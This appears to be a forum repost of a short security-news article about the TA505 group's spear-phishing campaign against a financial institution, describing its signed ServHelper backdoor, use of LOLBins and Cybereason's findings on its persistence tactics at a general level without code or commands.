TA505 Spear Phishing Campaign Uses LOLBins to Avoid Detection


Level 37
Feb 4, 2016
The TA505 hacking group ran a spear phishing campaign targeting a financial institution during April with the help of a signed version of the ServHelper backdoor and a number of LOLBins designed to help the operation evade detection.

TA505 is a threat group known to have been active since at least Q3 2014 [1, 2] and to have attacked a multiple financial institutions and retail companies using large sized malicious spam campaigns driven with the help of the Necurs botnet and dropping the Dridex and Trick banking Trojans, as well as the Locky and Jaff ransomware strains on their targets computers. [1, 2, 3]

During November 2018, TA505 started distributing new malicious tools as discovered by Proofpoint, the ServHelper backdoor and the FlawedGrace remote access Trojan (RAT) as part of multiple malware campaigns focused on banks, retail businesses, and restaurants.

Persistence based on the environment
Cybereason's security researchers found that TA505's highly targeted phishing attacks made use of "selective persistence mechanism and self kill commands based on autonomous reconnaissance," as well as "deliberate timeline, indicated by the timing of the phishing attack and signing of the malicious code" using a legitimate certificate from Sectigo RSA Code Signing CA.